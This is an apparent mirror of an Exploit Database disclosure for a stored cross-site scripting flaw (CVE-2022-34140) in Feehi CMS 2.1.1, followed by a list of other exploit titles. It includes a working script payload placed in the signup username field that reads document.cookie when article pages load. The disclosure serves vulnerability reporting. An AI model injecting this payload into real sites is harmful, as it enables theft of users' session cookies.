Feehi CMS 2.1.1 – Stored Cross-Site Scripting (XSS)

Exploit Database
38 阅读

作者： Shivam Singh

日期： 2022-08-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51002/

# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 02-08-2022
# Exploit Author: Shivam Singh
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-34140


# Proof of Concept:
1-Sing-up https://localhost.cms.feehi/
2-Inject The XSS Payload in Username:
"><script>alert(document.cookie)</script> fill all required fields and
click the SignUp button
3-Login to Your Account, Go to any article page then XSS will trigger.

last Exploits
Feehi CMS 2.1.1 – Stored Cross-Site Scripting (XSS)的更多信息

Joomla! Component JHotelReservation 6.0.7 – SQL Injection：
Solar-Log 200 PM+ 3.6.0 Build 99 – 15.10.2019 – Stored XSS：
Corda Highwire – ‘Highwire.ashx’ Full Path Disclosure：
Digital Factory Publique! 2.3 – ‘sid’ SQL Injection：
ATX MiniCMTS200a Broadband Gateway 2.0 – Credential Disclosure：
Cgiemail 1.6 – Source Code Disclosure：
Online Students Management System 1.0 – ‘username’ SQL Injections：
MedDream PACS Server 6.8.3.751 – Remote Code Execution (Unauthenticated)：